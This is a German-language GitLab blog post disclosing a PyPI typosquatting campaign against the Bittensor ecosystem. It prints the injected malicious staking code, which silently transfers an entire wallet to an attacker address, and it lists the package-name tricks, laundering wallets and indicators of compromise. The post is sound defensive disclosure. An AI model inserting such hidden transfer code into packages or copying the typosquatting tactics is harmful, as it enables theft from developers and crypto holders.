Veröffentlicht am: 6. August 2025

5 Minuten Lesezeit

GitLab deckt Bittensor-Diebstahlkampagne über PyPI auf

Das Vulnerability Research Team von GitLab identifizierte eine Supply-Chain-Angriffskampagne, die Typosquatting-PyPI-Pakete verwendet, um Kryptowährung aus Bittensor-Wallets durch Manipulation von Staking-Operationen zu stehlen.

Das Vulnerability Research Team von GitLab hat eine ausgeklügelte

Kryptowährungs-Diebstahlkampagne identifiziert, die das Bittensor-Ökosystem

durch Typosquatting-Python-Pakete auf PyPI ins Visier nimmt.

Die Untersuchung begann, als das automatisierte Paket-Überwachungssystem von GitLab verdächtige Aktivitäten im Zusammenhang mit beliebten Bittensor-Paketen meldete. Es wurden mehrere Typosquatting-Varianten legitimer Bittensor-Pakete entdeckt, die jeweils darauf ausgelegt waren, Kryptowährung von ahnungslosen Entwickler(inne)n und Nutzer(inne)n zu stehlen.

Geschäftsrelevanz: Dieser koordinierte Angriff zeigt, wie Cyberkriminelle systematisch vertrauensvolle Software-Ökosysteme ausnutzen. 90% der Fortune-500-Unternehmen nutzen Open-Source-Komponenten - jede davon ist ein potentieller Angriffspunkt für ähnliche Kampagnen.

Die Angriffsmethode im Detail

Die identifizierten bösartigen Pakete wurden alle innerhalb eines 25-minütigen Zeitfensters am 6. August 2025 veröffentlicht:

Alle Pakete wurden entwickelt, um die legitimen bittensor- und bittensor-cli-Pakete nachzuahmen, die Kernkomponenten des dezentralisierten KI-Netzwerks Bittensor sind.

Technische Analyse: So funktioniert der Diebstahl

Die Analyse offenbarte einen sorgfältig ausgearbeiteten Angriffsvektor, bei dem die Angreifer legitime Staking-Funktionalitäten modifizierten, um Gelder zu stehlen. Die bösartigen Pakete enthalten eine manipulierte Version der stake_extrinsic-Funktion in bittensor_cli/src/commands/stake/add.py.

Wo Nutzer(innen) eine normale Staking-Operation erwarten, haben die Angreifer in Zeile 275 bösartigen Code eingefügt, der stillschweigend alle Gelder in ihre Wallet umleitet:


result = await transfer_extrinsic(
  subtensor=subtensor,
  wallet=wallet,
  destination="5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR",
  amount=amount,
  transfer_all=True,
  prompt=False
)

Diese bösartige Injektion untergräbt den Staking-Prozess vollständig:

  • Stille Ausführung: Verwendet prompt=False, um die Benutzerbestätigung zu umgehen

  • Vollständige Wallet-Entleerung: Setzt transfer_all=True, um alle verfügbaren Gelder zu stehlen, nicht nur den Staking-Betrag

  • Hartcodiertes Ziel: Leitet alle Gelder an die Wallet-Adresse der Angreifer weiter

  • Versteckt in Sichtweite: Wird während einer scheinbar normalen Staking-Operation ausgeführt

Das Perfide an diesem Angriff: Nutzer(innen) glauben, Token für Belohnungen zu staken, während die modifizierte Funktion stattdessen die gesamte Wallet entleert.

Besondere Relevanz für deutsche Unternehmen

Diese Angriffsmethodik ist nicht auf Kryptowährungen beschränkt. Ähnliche Typosquatting-Strategien könnten manipulierte Pakete in geschäftskritische Systeme einschleusen - von Zahlungsverarbeitung bis hin zu Industriesteuerungen.

Warum die Staking-Funktionalität ins Visier genommen wird

Die Angreifer scheinen gezielt Staking-Operationen aus kalkulierten Gründen ins Visier genommen zu haben. In Blockchain-Netzwerken wie Bittensor bedeutet Staking, dass Nutzer(innen) ihre Kryptowährungs-Token sperren, um Netzwerkoperationen zu unterstützen und im Gegenzug Belohnungen zu erhalten – ähnlich wie Zinsen auf eine Einlage.

Dies macht Staking zu einem idealen Angriffsvektor:

  1. Hochwertige Ziele: Nutzer(innen), die staken, besitzen typischerweise erhebliche Kryptowährungsbestände, was sie zu lukrativen Opfern macht.

  2. Erforderlicher Wallet-Zugriff: Staking-Operationen erfordern, dass Nutzer(innen) ihre Wallets entsperren und Authentifizierung bereitstellen – genau das, was der bösartige Code benötigt, um Gelder abzuziehen.

  3. Erwartete Netzwerkaktivität: Da Staking natürlich Blockchain-Transaktionen beinhaltet, erregt die zusätzliche bösartige Übertragung nicht sofort Verdacht.

  4. Routineoperationen: Erfahrene Nutzer(innen) staken regelmäßig, was Vertrautheit schafft, die zu Nachlässigkeit führt und die Aufmerksamkeit reduziert.

  5. Verzögerte Entdeckung: Nutzer(innen) könnten anfänglich annehmen, dass Saldoänderungen normale Staking-Gebühren oder temporäre Sperrungen sind, was die Entdeckung des Diebstahls verzögert.

Durch das Verstecken von bösartigem Code in legitim aussehender Staking-Funktionalität nutzten die Angreifer sowohl die technischen Anforderungen als auch die Nutzerpsychologie von Routine-Blockchain-Operationen aus.

Der Geldspur folgen

Das Vulnerability Research Team von GitLab verfolgte die Kryptowährungsflüsse, um das volle Ausmaß dieser Operation zu verstehen. Die primäre Ziel-Wallet 5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR diente als zentraler Sammelpunkt, bevor die Gelder durch ein Netzwerk von Zwischen-Wallets verteilt wurden.

Das Geldwäsche-Netzwerk

Die Analyse offenbarte ein mehrstufiges Geldwäschesystem:

  1. Primäre Sammlung: Gestohlene Gelder kommen zunächst bei 5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR an

  2. Verteilungsnetzwerk: Gelder werden schnell zu Zwischen-Wallets verschoben, einschließlich:

    • 5HpsyxZKvCvLEdLTkWRM4d7nHPnXcbm4ayAsJoaVVW2TLVP1
    • 5GiqMKy1kAXN6j9kCuog59VjoJXUL2GnVSsmCRyHkggvhqNC
    • 5ER5ojwWNF79k5wvsJhcgvWmHkhKfW5tCFzDpj1Wi4oUhPs6
    • 5CquBemBzAXx9GtW94qeHgPya8dgvngYXZmYTWqnpea5nsiL
  3. Finale Konsolidierung: Alle Pfade konvergieren schließlich bei 5D6BH6ai79EVN51orsf9LG3k1HXxoEhPaZGeKBT5oDwnd2Bu

  4. Auszahlungsendpunkt: Das finale Ziel scheint 5HDo9i9XynX44DFjeoabFqPF3XXmFCkJASC7FxWpbqv6D7QQ zu sein

Die Typosquatting-Strategie

Die Angreifer verwendeten eine Typosquatting-Strategie, die häufige Tippfehler und Paket-Namenskonventionen ausnutzt:

  • Fehlende Zeichen: bitensor statt bittensor (fehlendes 't')

  • Kürzung: bittenso statt bittensor (fehlendes finales 'r')

  • Versions-Nachahmung: Alle Pakete verwendeten Versionsnummern (9.9.4, 9.9.5), die den legitimen Paketversionen sehr ähnlich sind

Dieser Ansatz maximiert die Installationswahrscheinlichkeit durch Entwickler-Tippfehler während pip install-Befehlen und Copy-Paste-Fehler aus Dokumentationen.

Die Zukunft der Supply-Chain-Sicherheit

GitLab investiert weiterhin in proaktive Sicherheitsforschung, um Bedrohungen zu identifizieren und zu neutralisieren, bevor sie die Community beeinträchtigen. Das automatisierte Erkennungssystem arbeitet rund um die Uhr, um die Software-Supply-Chain zu schützen, die die moderne Entwicklung antreibt.

Die schnelle Erkennung und Analyse dieses Angriffs demonstriert den Wert proaktiver Sicherheitsmaßnahmen im Kampf gegen ausgeklügelte Bedrohungen. Durch das Teilen der Erkenntnisse streben wir danach, die Widerstandsfähigkeit des gesamten Ökosystems gegen zukünftige Angriffe zu stärken.

Kompromittierungsindikatoren

| IOC | Beschreibung |

| -------------------------------------------------- | ----------------------------------------------------------------- |

| pkg:pypi/[email protected] | Bösartiges PyPI-Paket |

| pkg:pypi/[email protected] | Bösartiges PyPI-Paket |

| pkg:pypi/[email protected] | Bösartiges PyPI-Paket |

| pkg:pypi/[email protected] | Bösartiges PyPI-Paket |

| pkg:pypi/[email protected] | Bösartiges PyPI-Paket |

| 5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR | Bittensor (TAO) Wallet-Adresse für den Empfang gestohlener Gelder |

Zeitachse

| Datum & Uhrzeit | Aktion |

| -------------------- | --------------------------------------------------------------------------------------------- |

| 2025-08-06T06:33 | Erste Analyse verdächtiger Pakete, die vom automatisierten Überwachungssystem gemeldet wurden |

| 2025-08-06T09:42 | [email protected] an PyPi.org gemeldet |

| 2025-08-06T09:46 | [email protected] an PyPi.org gemeldet |

| 2025-08-06T09:47 | [email protected] an PyPi.org gemeldet |

| 2025-08-06T09:49 | [email protected] an PyPi.org gemeldet |

| 2025-08-06T09:51 | [email protected] an PyPi.org gemeldet |

| 2025-08-06T15:26 | PyPi.org entfernte [email protected] |

| 2025-08-06T15:27 | PyPi.org entfernte [email protected] |

| 2025-08-06T15:27 | PyPi.org entfernte [email protected] |

| 2025-08-06T15:28 | PyPi.org entfernte [email protected] |

| 2025-08-06T15:28 | PyPi.org entfernte [email protected] |

Wir möchten gern von dir hören

Hat dir dieser Blogbeitrag gefallen oder hast du Fragen oder Feedback? Erstelle ein neues Diskussionsthema im GitLab-Community-Forum und tausche deine Eindrücke aus.
Share your feedback

Mehr als 50 % der Fortune-100-Unternehmen vertrauen GitLab

Stelle jetzt bessere Software schneller bereit

Erlebe, was dein Team mit der intelligenten

DevSecOps-Plattform erreichen kann.